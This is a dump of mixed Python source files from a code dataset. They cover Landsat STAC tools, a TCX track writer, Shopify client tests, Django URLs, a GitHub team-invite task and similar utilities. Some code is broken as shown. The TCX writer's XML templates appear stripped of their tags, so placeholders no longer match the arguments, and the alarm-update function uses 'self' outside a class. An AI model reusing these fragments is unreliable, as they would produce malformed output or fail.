directory/blob prefix/etc.\n \"\"\"\n if level != 'level-2':\n raise click.BadOptionUsage(\"level\",\n \"Only level-2 currently implemented.\")\n\n item = create_stac_item(mtl_xml_href=mtl)\n item.set_self_href(os.path.join(output, f'{item.id}.json'))\n item.save_object()\n\n @landsat.command(\n \"convert\",\n short_help=\"Convert a USGS STAC 0.7 Item to an updated STAC Item\")\n @click.option(\"--stac\", \"-s\", required=True, help=\"Path to a STAC file.\")\n @click.option(\n \"--enable-proj\",\n \"-p\",\n is_flag=True,\n help=\"Enable the proj extension. 
Requires access to blue band.\")\n @click.option(\"--dst\", \"-d\", help=\"Output directory\")\n def convert_cmd(stac, enable_proj, dst):\n in_item = pystac.Item.from_file(stac)\n item = transform_stac_to_stac(in_item, enable_proj=enable_proj)\n\n item_path = os.path.join(dst, '{}.json'.format(item.id))\n item.set_self_href(item_path)\n item.save_object()\n\n return landsat\n","sub_path":"src/stactools/landsat/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"526686666","text":"# Write a Python Pandas program to convert the first column of a DataFrame as a Series.\n\n# start\n# import modules\n\nimport pandas as pd\ndf = pd.DataFrame({'x': [4, 34, 12, 40, 82, 42], 'y': [43, 25, 76, 89, 43, 10], 'z': [72, 52, 80, 72, 134, 42]})\n# df = pd.DataFrame(data=d)\nprint((\"Original DataFrame\") + str(df))\n# print(df)\ns = df.iloc[:,0]\n\nprint((\"First column converted to series: \\n\") + str(s))\n\n# print(\"\\n1st column as a Series:\")\n# print(s)\n# print(type(s))\n","sub_path":"Pandas exercises/DataSeries/8. Convert first column of DataFrame as a series.py","file_name":"8. Convert first column of DataFrame as a series.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"566901321","text":"\"\"\" Simple CSV writer for Schwinn 810 \"\"\"\n\nfrom __future__ import print_function\nimport sys,os\nimport subprocess\nimport csv\nimport logging\nfrom writer import *\nfrom pytz import timezone, utc\nfrom datetime import datetime, timedelta\n\n_log = logging.getLogger(__name__)\n\ntz = utc #timezone(\"UTC\")\n\nopen_extra = {}\nif sys.version_info >= (3,0):\n open_extra[\"newline\"] = ''\n\nclass WriterTCX(Writer):\n \"\"\" TCX files writer \"\"\"\n\n track_keys = [\"Start\", \"End\", \"Laps\", \"MaxHeart\", \"Heart\", \"MaxSpeed\", \\\n \"Speed\", \"x4\", \"x5\", \"Points\", \"Track\"]\n lap_keys = [\"Time\", \"Speed\", \"Lap\", \"Distance\", \"kcal\", \"MaxSpeed\", \\\n \"autolap\", \"Beats\", \"sec\", \"MaxHeart\", \"MinHeart\", \\\n \"InZone\", \"y4\", \"Elevation\", \"Track\"]\n point_keys = [\"Distance\", \"Speed\", \"Time\", \"Heart\", \"x1\", \"InZone\", \\\n \"Latitude\", \"Longitude\", \"kcal\", \"Elevation\", \"No\", \"Track\"]\n waypoint_keys = [\"Time\", \"Name\", \"Latitude\", \"Longitude\",\"x1\",\"x2\",\"Elevation\",\"No\"]\n settings_keys = [\"Female\", \"Age\", \"Metric\", \"x3\", \"kg\", \"cm\", \"zone_active\", \\\n \"zone1_low\", \"zone1_high\", \"zone2_low\", \"zone2_high\", \"zone3_low\",\\\n \"zone3_high\", \"zone_alarm\", \"x5\", \"Autolap\", \"Contrast\", \"x8\", \"NightMode\", \\\n \"y2\", \"lb\", \"in\", \"24hr\", \"y6\", \"y7\", \"y8\", \"z1\", \"z2\"]\n\n def __init__(self, dir, hook=None):\n self.dir = dir\n self.hook = hook\n \n self.lapFile = None\n self.lapWriter = None\n\n self.ptsFile = None\n self.ptsWriter = None\n self.tracks_processed = []\n\n #name = os.path.join(self.dir, \"waypoints.csv\")\n #wptFile = open(name, \"wb\", **open_extra)\n #self.wptWriter = csv.DictWriter(wptFile, self.waypoint_keys)\n #self.wptWriter.writeheader()\n\n def output(self, text):\n print(text, file=self.trkFile)\n\n def add_track(self, track):\n \"\"\" Append track to database \"\"\"\n name = os.path.join(self.dir, '%s.tcx' % track['Track'])\n track['Filename'] = name\n self.trkFile = open(name, \"wb\", **open_extra)\n self.open_track(track)\n\n for lap in 
track['LapData']:\n self.add_lap(lap)\n\n self.close_track()\n self.trkFile.close()\n\n self.tracks_processed.append(track)\n\n\n def open_track(self, track):\n track_start = track[\"Start\"]\n self.output(\"\"\"\n\n\n \n \n {:s}\"\"\".format(track_start.strftime(\"%Y-%m-%dT%H:%M:%SZ\")))\n\n\n\n def open_lap(self, lap):\n \"\"\" Add a lap to the tcx file \"\"\"\n time = float(lap[\"Time\"])\n kcal = int(float(lap[\"kcal\"]))\n lap_dist = float(lap[\"Distance\"])*1.e3\n beats = int(lap[\"Beats\"])\n try:\n lap_start = lap['Start'].strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n except Exception as e:\n print(lap)\n raise e\n \n duration_secs = lap['DurationSecs']\n \n self.output(\"\"\" \n {:f}\n {:f}\n {:0.1f}\n {:d}\n {:d}\"\"\".format(lap_start, \\\n duration_secs, \\\n lap['LengthMeters'], \\\n lap[\"MaxSpeed\"], \\\n int(lap['kcalDelta']), \\\n int(lap['BeatsDelta']/(duration_secs))))\n heart_max = int(lap[\"MaxHeart\"])\n if heart_max>0:\n self.output(\"\"\" {:d}\"\"\".format(heart_max))\n self.output(\"\"\" Active\n Location\n \"\"\")\n\n def add_lap(self, lap):\n _log.debug(\"writing lap with {:d} points\".format(len(lap['PointData'])))\n self.open_lap(lap)\n for point in lap['PointData']:\n self.add_point(point, lap)\n self.close_lap()\n\n def add_point(self, point, parent_lap):\n \"\"\" Append point to a open lap \"\"\"\n time = tz.localize(point[\"Time\"])\n dist = float(point[\"Distance\"])*1.e3\n self.output(\"\"\" \n \n \n {:f}\n {:f}\n \n {:f}\"\"\".format(time.astimezone(utc).strftime(\"%Y-%m-%dT%H:%M:%SZ\"), \\\n point[\"Latitude\"], \\\n point[\"Longitude\"], \\\n dist))\n if parent_lap['HasElevation']:\n self.output(\"\"\" {:d}\"\"\".format(int(point[\"Elevation\"])))\n heart = int(float(point[\"Heart\"]))\n if heart > 0:\n self.output(\"\"\" {:d}\n Present\"\"\".format(heart))\n else:\n self.output(\" Absent\")\n\n self.output(\" \")\n\n def close_lap(self):\n \"\"\" Add the tags to close the lap \"\"\"\n self.output(\" \")\n self.output(\" \")\n\n def close_track(self):\n \"\"\" Add the tags to close the track \"\"\"\n self.output(\"\")\n self.output(\"\")\n self.output(\"\")\n\n def add_waypoint(self, wp):\n \"\"\" Append point to a database \"\"\"\n # do nowt\n \n\n def save_settings(self, s):\n name = os.path.join(self.dir, \"settings.csv\")\n f = open(name, \"wb\", **open_extra)\n w = csv.DictWriter(f, self.settings_keys)\n w.writeheader()\n w.writerow(s)\n\n def tracks_written(self):\n return self.tracks_processed\n\nif __name__ == '__main__':\n pass\n","sub_path":"src/core/writer_tcx.py","file_name":"writer_tcx.py","file_ext":"py","file_size_in_byte":6832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"434505206","text":"from collections import deque\n\ninput = \"input.in\"\nfile = open(input, \"r\")\n\nfor line in file:\n\tsp = line.split()\n\tn, v = int(sp[0]), int(sp[6])\n\n\tscore = [0] * n\n\tch = deque()\n\tch.append(0)\n\t\n\tfor i in range(1, v+1):\n\t\t#print(i,idx, ch)\n\t\tif i%23 != 0:\n\t\t\tch.rotate(-1)\n\t\t\tch.append(i)\n\t\telse:\n\t\t\tch.rotate(7)\n\t\t\tscore[i%n] += i + ch.pop()\n\t\t\tch.rotate(-1)\n\tprint(max(score))\n","sub_path":"2018/day09/q1/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"255782011","text":"# -*- coding: UTF-8 -*-\n\"\"\"\n check project\n ~~~~~~~~\n :copyright: (c) 2017 by bh\n\"\"\"\n\nimport os\nfrom site_config import config\n\n# To get 
request.remote_ip when running tornado behind a reverse proxy\n# we need xheaders to True\nserver_settings = {\n \"xheaders\": True,\n}\n\napp_settings = {\n \"debug\": config['DEBUG'],\n \"cookie_secret\": config['COOKIE_SECRET'],\n \"static_path\": os.path.join(os.path.dirname(__file__), \"..\", \"static\"),\n \"template_path\": os.path.join(os.path.dirname(__file__), \"..\", \"templates\"),\n}\n","sub_path":"www/server/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"127179866","text":"\"\"\"Module for generating log data statistics.\"\"\"\nfrom pathlib import Path\nfrom typing import Dict, Optional, Sequence, Tuple\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nfrom biopsykit.carwatch_logs import LogData\nfrom biopsykit.io.carwatch_logs import load_logs_all_subjects\nfrom biopsykit.utils._types import path_t\n\n\nclass LogStatistics:\n \"\"\"Class to compute statistics from CARWatch log data collected during one study.\"\"\"\n\n def __init__(self, base_folder: path_t):\n \"\"\"Initialize a new ``LogStatistics`` instance.\n\n Parameters\n ----------\n base_folder : :class:`~pathlib.Path` or str\n base folder path to log data from all subjects of one study\n\n \"\"\"\n self.path: Path = Path(base_folder)\n self.log_dict: Dict[str, pd.DataFrame] = load_logs_all_subjects(self.path, return_df=False)\n self.log_data: Sequence[LogData] = [LogData(df) for df in self.log_dict.values()]\n\n def conditions(self) -> pd.DataFrame:\n \"\"\"Return statistics of study conditions available in the log data.\n\n Returns\n -------\n :class:`~pandas.DataFrame`\n dataframe with study conditions and their frequency\n\n \"\"\"\n series = pd.Series([log.condition for log in self.log_data], name=\"count\")\n df = series.value_counts()\n df = df.reset_index().rename({\"index\": \"condition\"}, axis=1)\n return df\n\n def android_versions(self, skip_na: Optional[bool] = True) -> pd.DataFrame:\n \"\"\"Return statistics of Android versions of the smartphones used in the study.\n\n Parameters\n ----------\n skip_na : bool, optional\n ``True`` to exclude Android versions that are not present in the study from the result dataframe,\n ``False`` otherwise. 
Default: ``True``\n\n Returns\n -------\n :class:`~pandas.DataFrame`\n dataframe with all available Android versions and their frequency\n\n \"\"\"\n version_list = [log.android_version for log in self.log_data]\n hist = np.bincount(version_list, minlength=30)\n df = pd.DataFrame(data=hist, columns=[\"count\"], index=range(0, len(hist)))\n # remove 1 - 20 as minimum supported android version is SDK level 21\n df.drop(list(range(1, 21)), axis=0, inplace=True)\n\n if skip_na:\n df.drop(0, axis=0, inplace=True)\n else:\n df.rename({0: \"n/a\"}, inplace=True)\n\n df = df.reset_index().rename({\"index\": \"android_version\"}, axis=1)\n return df\n\n def app_versions(self) -> pd.DataFrame:\n \"\"\"Return statistics of CARWatch App versions used in the study.\n\n Returns\n -------\n :class:`~pandas.DataFrame`\n dataframe with all available CARWatch App versions and their frequency\n\n \"\"\"\n series = pd.Series([log.app_version for log in self.log_data], name=\"count\")\n\n df = series.value_counts().reset_index().rename({\"index\": \"app_version\"}, axis=1)\n # df.sort_values(by=['count', 'app_version'], ascending=[False, True], inplace=True)\n return df\n\n def manufacturer(self, skip_na: Optional[bool] = True) -> pd.DataFrame:\n \"\"\"Return statistics of the manufacturer names of smartphones used in the study.\n\n Parameters\n ----------\n skip_na : bool, optional\n ``True`` to exclude non-available manufacturer names from the result dataframe,\n ``False`` otherwise. Default: ``True``\n\n Returns\n -------\n :class:`~pandas.DataFrame`\n dataframe with all available smartphone manufacturers and their frequency\n\n \"\"\"\n series = pd.Series([log.manufacturer for log in self.log_data], name=\"count\")\n if skip_na:\n series = series[~series.str.contains(\"n/a\")]\n\n df = series.value_counts().reset_index().rename({\"index\": \"manufacturer\"}, axis=1)\n df.sort_values(by=[\"count\", \"manufacturer\"], ascending=[False, True], inplace=True)\n return df\n\n def models(self, skip_na: Optional[bool] = True) -> pd.DataFrame:\n \"\"\"Return statistics of the smartphone models used in the study.\n\n Parameters\n ----------\n skip_na : bool, optional\n ``True`` to exclude non-available smartphone model names from the result dataframe,\n ``False`` otherwise. 
Default: ``True``\n\n Returns\n -------\n :class:`~pandas.DataFrame`\n dataframe with all available smartphone model names and their frequency\n\n \"\"\"\n series = pd.Series([log.model for log in self.log_data], name=\"count\")\n if skip_na:\n series = series[~series.str.contains(\"n/a\")]\n df: pd.DataFrame = series.value_counts()\n\n df = df.reset_index().rename({\"index\": \"model\"}, axis=1)\n df.sort_values(by=[\"count\", \"model\"], ascending=[False, True], inplace=True)\n return df\n\n def finished_days(self) -> pd.DataFrame:\n \"\"\"Return statistics of finished study days per subject.\n\n Returns\n -------\n :class:`~pandas.DataFrame`\n dataframe with frequency of finished study days\n\n \"\"\"\n series = pd.Series([log.num_finished_days for log in self.log_data], name=\"count\")\n df = series.value_counts(sort=False)\n\n df = df.reset_index().rename({\"index\": \"finished_days\"}, axis=1)\n return df\n\n def days(self) -> pd.DataFrame:\n \"\"\"Return statistics of recording days in the study.\n\n Returns\n -------\n :class:`~pandas.DataFrame`\n dataframe with frequency of recording days\n\n \"\"\"\n series = pd.Series(np.concatenate([log.log_dates for log in self.log_data]), name=\"count\")\n df = series.value_counts(sort=False)\n df.sort_index(inplace=True)\n\n df = df.reset_index().rename({\"index\": \"logging_days\"}, axis=1)\n return df\n\n def get_plot(self, plot_id: str, **kwargs) -> Tuple[plt.Figure, plt.Axes]: # pylint:disable=too-many-branches\n \"\"\"Return barplot to visualize log data statistics for one data type.\n\n Parameters\n ----------\n plot_id : str\n type of data to plot\n\n Returns\n -------\n fig : :class:`matplotlib.figure.Figure`\n figure object\n ax : :class:`matplotlib.axes.Axes`\n axes object\n\n \"\"\"\n ax: plt.Axes = kwargs.pop(\"ax\", None)\n if ax is None:\n fig, ax = plt.subplots()\n else:\n fig = ax.get_figure()\n\n if plot_id in [\"condition\", \"conditions\"]:\n df = self.conditions()\n elif plot_id in [\"manufacturer\", \"manufacturers\"]:\n df = self.manufacturer()\n elif plot_id in [\"android\", \"android_version\", \"android_versions\"]:\n df = self.android_versions()\n elif plot_id in [\"app\", \"app_version\", \"app_versions\"]:\n df = self.app_versions()\n elif plot_id in [\"model\", \"models\"]:\n df = self.models()\n elif plot_id in [\"finished\", \"finished_days\"]:\n df = self.finished_days()\n elif plot_id in [\"days\", \"logging_days\"]:\n df = self.days()\n else:\n raise ValueError(\"Invalid plot_id '{}'!\".format(plot_id))\n\n palette = sns.cubehelix_palette(len(df), start=0.5, rot=-0.75)\n\n cols = df.columns\n ax = sns.barplot(x=cols[0], y=cols[1], data=df, ax=ax, palette=palette)\n\n if plot_id in [\"model\", \"days\"]:\n ax.set_xticklabels(ax.get_xticklabels(), rotation=45, ha=\"right\")\n\n return fig, ax\n","sub_path":"src/biopsykit/carwatch_logs/log_statistics.py","file_name":"log_statistics.py","file_ext":"py","file_size_in_byte":7640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"231756601","text":"from cumulusci.tasks.github.base import BaseGithubTask\n\nclass GithubOrgUsers(BaseGithubTask):\n task_options = {\n \"org\": {\n \"description\": \"The Github Organization name\",\n \"required\": True,\n },\n \"file\": {\n \"description\": \"Path to a text file that contains a list of usernames (1 per line)\",\n \"required\": True,\n },\n \"team\": {\n \"description\": \"Github Org Team Name\",\n \"required\": True,\n },\n }\n def _run_task(self):\n org = 
self.github.organization(self.options[\"org\"])\n team = None\n for org_team in org.teams():\n if org_team.name == self.options[\"team\"]:\n team = org_team\n break\n if not team:\n team = org.create_team(self.options[\"team\"]) \n\n with open(self.options[\"file\"]) as f:\n for line in f.readlines():\n username = line.strip()\n user = self.github.user(username)\n self.logger.info(\"adding {} to team {}\".format(username, team.name))\n org.invite([team.id], invitee_id = user.id)\n\n #getting into Github API\n import pdb; pdb.set_trace()","sub_path":"tasks/github_org_users.py","file_name":"github_org_users.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"153387960","text":"\"\"\"MyWeb URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom liblab import views as liblab_views\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', liblab_views.index , name='index'),\n url(r'^index/', liblab_views.index, name='index'),\n url(r'^books/', liblab_views.books, name='books'),\n url(r'^dvds/', liblab_views.dvds, name='dvds'),\n url(r'^others/', liblab_views.others, name='others'),\n url(r'^about/', liblab_views.about, name='about'),\n url(r'^myacct/', liblab_views.myacct, name='myacct'),\n url(r'^register/', liblab_views.register, name='register'),\n url(r'^base/', liblab_views.base, name='base'),\n]\n","sub_path":"MyWeb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"305426169","text":"from time import monotonic\nfrom unittest.mock import AsyncMock\n\nimport pytest\nfrom pydantic import validator\nfrom pydantic.dataclasses import dataclass\n\nfrom spylib import Store\nfrom spylib.exceptions import ShopifyCallInvalidError\n\n\n@dataclass\nclass MockHTTPResponse:\n status_code: int\n jsondata: dict\n headers: dict = None # type: ignore\n\n @validator('headers', pre=True, always=True)\n def set_id(cls, fld):\n return fld or {'X-Shopify-Shop-Api-Call-Limit': '39/40'}\n\n def json(self):\n return self.jsondata\n\n\n@pytest.mark.asyncio\nasync def test_store_rest_happypath(mocker):\n store = Store(store_id='TEST', name='test-store', access_token='Te5tM3')\n\n shopify_request_mock = mocker.patch(\n 'httpx.AsyncClient.request',\n new_callable=AsyncMock,\n return_value=MockHTTPResponse(status_code=200, jsondata={'success': True}),\n )\n\n jsondata = await store.shoprequest(\n goodstatus=200, debug='Test failed', endpoint='/test.json', method='get'\n )\n\n shopify_request_mock.assert_called_once()\n\n assert jsondata == {'success': True}\n\n # 80 from assuming Shopify plus then 1 used just now.\n assert store.tokens == 79\n\n\n@pytest.mark.asyncio\nasync def test_store_rest_badrequest(mocker):\n store = 
Store(store_id='TEST', name='test-store', access_token='Te5tM3')\n\n shopify_request_mock = mocker.patch(\n 'httpx.AsyncClient.request',\n new_callable=AsyncMock,\n return_value=MockHTTPResponse(\n status_code=422, jsondata={'errors': {'title': [\"can't be blank\"]}}\n ),\n )\n\n with pytest.raises(ShopifyCallInvalidError):\n await store.shoprequest(\n goodstatus=201,\n debug='Test failed',\n endpoint='/products.json',\n method='post',\n json={'product': {'body_html': 'A mystery!'}},\n )\n\n shopify_request_mock.assert_called_once()\n\n\nparams = [\n pytest.param(0, 1000, 79, id='Last call hit rate limit, long time ago'),\n pytest.param(0, 20, 79, id='Last call hit rate limit, 20s ago'),\n pytest.param(0, 10, 39, id='Last call hit rate limit, 10s ago'),\n # Wait 1 second to get 4 then use 1 so 3\n pytest.param(0, 0, 3, id='Last call that hit rate limit just happened'),\n]\n\n\n@pytest.mark.parametrize('init_tokens, time_passed, expected_tokens', params)\n@pytest.mark.asyncio\nasync def test_store_rest_ratetokens(init_tokens, time_passed, expected_tokens, mocker):\n store = Store(store_id='TEST', name='test-store', access_token='Te5tM3')\n\n # Simulate that there is only 2 calls available before hitting the rate limit.\n # If we set this to zero, then the code will wait 1 sec which is not great to keep the tests\n # fast\n store.tokens = init_tokens\n store.updated_at = monotonic() - time_passed # A looooong time ago\n\n shopify_request_mock = mocker.patch(\n 'httpx.AsyncClient.request',\n new_callable=AsyncMock,\n return_value=MockHTTPResponse(status_code=200, jsondata={'success': True}),\n )\n await store.shoprequest(\n goodstatus=200, debug='Test failed', endpoint='/test.json', method='get'\n )\n\n shopify_request_mock.assert_called_once()\n\n assert store.tokens == expected_tokens\n\n\n@pytest.mark.asyncio\nasync def test_store_graphql_happypath(mocker):\n store = Store(store_id='TEST', name='test-store', access_token='Te5tM3')\n\n query = '''\n {\n shop {\n name\n }\n }'''\n data = {'shop': {'name': 'graphql-admin'}}\n gql_response = {\n 'data': data,\n 'extensions': {\n 'cost': {\n 'requestedQueryCost': 1,\n 'actualQueryCost': 1,\n 'throttleStatus': {\n 'maximumAvailable': 1000,\n 'currentlyAvailable': 999,\n 'restoreRate': 50,\n },\n }\n },\n }\n\n shopify_request_mock = mocker.patch(\n 'httpx.AsyncClient.request',\n new_callable=AsyncMock,\n return_value=MockHTTPResponse(status_code=200, jsondata=gql_response),\n )\n\n jsondata = await store.execute_gql(query=query)\n\n shopify_request_mock.assert_called_once()\n\n assert jsondata == data\n\n\n@pytest.mark.asyncio\nasync def test_store_graphql_badquery(mocker):\n store = Store(store_id='TEST', name='test-store', access_token='Te5tM3')\n\n query = '''\n {\n shopp {\n name\n }\n }'''\n error_msg = \"Field 'shopp' doesn't exist on type 'QueryRoot'\"\n gql_response = {\n 'errors': [\n {\n 'message': error_msg,\n 'locations': [{'line': 2, 'column': 3}],\n 'path': ['query', 'shopp'],\n 'extensions': {\n 'code': 'undefinedField',\n 'typeName': 'QueryRoot',\n 'fieldName': 'shopp',\n },\n }\n ]\n }\n\n shopify_request_mock = mocker.patch(\n 'httpx.AsyncClient.request',\n new_callable=AsyncMock,\n return_value=MockHTTPResponse(status_code=200, jsondata=gql_response),\n )\n\n with pytest.raises(ValueError, match=f'^GraphQL query is incorrect:\\n{error_msg}$'):\n await store.execute_gql(query=query)\n\n shopify_request_mock.assert_called_once()\n\n\n@pytest.mark.asyncio\nasync def test_store_graphql_tokeninvalid(mocker):\n store = 
Store(store_id='TEST', name='test-store', access_token='INVALID')\n\n query = '''\n {\n shop {\n name\n }\n }'''\n gql_response = {\n 'errors': '[API] Invalid API key or access token (unrecognized login or wrong password)'\n }\n\n shopify_request_mock = mocker.patch(\n 'httpx.AsyncClient.request',\n new_callable=AsyncMock,\n return_value=MockHTTPResponse(status_code=200, jsondata=gql_response),\n )\n\n with pytest.raises(ConnectionRefusedError):\n await store.execute_gql(query=query)\n\n shopify_request_mock.assert_called_once()\n","sub_path":"tests/test_store.py","file_name":"test_store.py","file_ext":"py","file_size_in_byte":5951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"424377282","text":"from tree.my_lib import *\n# Build the lookup table first, then query it\nclass Solution:\n def __init__(self):\n self.table = {}\n\n def build_table(self, root):\n if not root:\n return\n self.table[root.val] = 1\n self.build_table(root.left)\n self.build_table(root.right)\n\n def findTarget(self, root: TreeNode, k: int) -> bool:\n if not root:\n return False\n if not self.table:\n self.build_table(root)\n tmp = k - root.val\n if tmp != root.val and tmp in self.table:\n return True\n left = self.findTarget(root.left, k)\n right = self.findTarget(root.right, k)\n return left or right\n\n# Build and query at the same time; more efficient\nclass Solution:\n def __init__(self):\n self.table = {}\n\n def build_table(self, root, k):\n if not root:\n return False\n self.table[root.val] = 1\n tmp = k - root.val\n if tmp != root.val and tmp in self.table: # even if no match is found at the current node, a real match will still be found while traversing the other nodes, so no wrong answer is returned\n return True\n return self.build_table(root.left, k) or self.build_table(root.right, k)\n\n def findTarget(self, root: TreeNode, k: int) -> bool:\n if not root:\n return False\n return self.build_table(root, k)","sub_path":"tree/653.py","file_name":"653.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"148010120","text":"def update_alarm(alarm):\n alarm = alarm.as_dict()\n values = []\n sql_query = (' UPDATE alarm'\n ' SET')\n\n # Note (alexstav): 'user_id' and 'project_id' may be None-type\n if alarm['user_id']:\n user_id_q = (\"SELECT id FROM users\"\n \" WHERE uuid = %s\")\n with PoolConnection(self.conn_pool) as db:\n db.execute(user_id_q, (alarm['user_id'],))\n user_resp = db.fetchone()\n if user_resp:\n user_id = user_resp.id\n sql_query += \" user_id = %s,\"\n values.append(user_id)\n else:\n LOG.debug(_(\"User does not exist in DB\"))\n return\n\n if alarm['project_id']:\n project_id_q = ('SELECT id from projects'\n ' WHERE uuid = %s')\n with PoolConnection(self.conn_pool) as db:\n db.execute(project_id_q, (alarm['project_id'],))\n project_resp = db.fetchone()\n if project_resp:\n project_id = project_resp.id\n sql_query += \" project_id = %s,\"\n values.append(project_id)\n else:\n LOG.debug(_(\"Project does not exist in DB\"))\n return\n\n if 'enabled' in alarm:\n sql_query += ' enabled = %s,'\n values.append(alarm['enabled'])\n if 'name' in alarm:\n sql_query += ' name = %s,'\n values.append(alarm['name'])\n if 'description' in alarm:\n sql_query += ' description = %s,'\n values.append(alarm['description'])\n if 'state' in alarm:\n sql_query += ' state = %s,'\n values.append(alarm['state'])\n if 'alarm_actions' in alarm:\n sql_query += ' alarm_actions = %s,'\n values.append(Json(alarm['alarm_actions']))\n if 'ok_actions' in alarm:\n sql_query += ' ok_actions = %s,'\n values.append(Json(alarm['ok_actions']))\n if 
'insufficient_data_actions' in alarm:\n sql_query += ' insufficient_data_actions = %s,'\n values.append(Json(alarm['insufficient_data_actions']))\n if 'repeat_actions' in alarm:\n sql_query += ' repeat_actions = %s,'\n values.append(alarm['repeat_actions'])\n if 'time_constraints' in alarm:\n sql_query += ' time_constraints = %s,'\n values.append(Json(alarm['time_constraints']))\n if 'rule' in alarm:\n sql_query += ' rule = %s'\n values.append(Json(alarm['rule']))\n\n sql_query = sql_query.rstrip(',')\n sql_query += ' WHERE alarm_id = %s'\n values.append(alarm['alarm_id'])\n\n with PoolConnection(self.conn_pool, cursor_factory=DictCursor) as db:\n db.execute(sql_query, values)\n # returns first Alarm object from generator\n stored_alarm = get_alarms(alarm_id=alarm['alarm_id']).next()\n return stored_alarm\n","sub_path":"Alarms/update_alarm_controller.py","file_name":"update_alarm_controller.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"636000883","text":"import json\n\nfile_path = \"./sample.json\"\n\ndata = {}\ndata['posts'] = []\ndata['posts'].append({\n \"title\": \"How to get stroage size\",\n \"url\": \"https://codechacha.com/ko/get-free-and-total-size-of-volumes-in-android/\",\n \"draft\": \"false\"\n})\ndata['posts'].append({\n \"title\": \"Android Q, Scoped Storage\",\n \"url\": \"https://codechacha.com/ko/android-q-scoped-storage/\",\n \"draft\": \"false\"\n})\nprint(data)\n\nwith open(file_path, 'w') as outfile:\n json.dump(data, outfile, indent=4)","sub_path":"dict_json_store.py","file_name":"dict_json_store.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"323714382","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport sys\nfrom clize import clize, run\nimport nnpy\nimport time\nimport json\nfrom microcore import message\n\n\ndef die(error):\n print(error)\n sys.exit(1)\n\n\n@clize\ndef admin(config_pathname, command, *arg):\n\n with open(config_pathname, 'rt') as config_file:\n config = json.loads(config_file.read())\n #print(config)\n\n pub = nnpy.Socket(nnpy.AF_SP, nnpy.PUB)\n pub.connect(config['PubURL'])\n\n sub = nnpy.Socket(nnpy.AF_SP, nnpy.SUB)\n sub.connect(config['SubURL'])\n sub.setsockopt(nnpy.SOL_SOCKET, nnpy.RCVTIMEO, 5000)\n sub.setsockopt(nnpy.SUB, nnpy.SUB_SUBSCRIBE, '')\n\n #time.sleep(1)\n\n reqmsg = None\n if command == 'ping':\n reqmsg = message.Ping()\n elif command == 'info':\n reqmsg = message.InfoReq(arg[0])\n\n if reqmsg is None:\n try:\n pub.close()\n sub.close()\n except:\n pass\n die('unsupported command: %s' % command)\n\n print('>> %s' % reqmsg)\n pub.send(reqmsg.toWire())\n\n received_data = False\n while True:\n try:\n msg = message.decode(sub.recv())\n if str(msg) != str(reqmsg):\n print('<< %s' % msg)\n received_data = True\n except nnpy.errors.NNError:\n if not received_data:\n print('No response')\n break\n except:\n print('Unexpected error: %s' % sys.exc_info()[0])\n break\n pub.close()\n sub.close()\n\n\nif __name__ == '__main__':\n run(admin)\n","sub_path":"nanomsg/node/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"32201668","text":"import unittest\nfrom unittest import mock\nimport sys\nsys.path.insert(1, '../../')\nfrom Remote.server import FishServer, FishClient, is_move, is_posn\n\n\nclass 
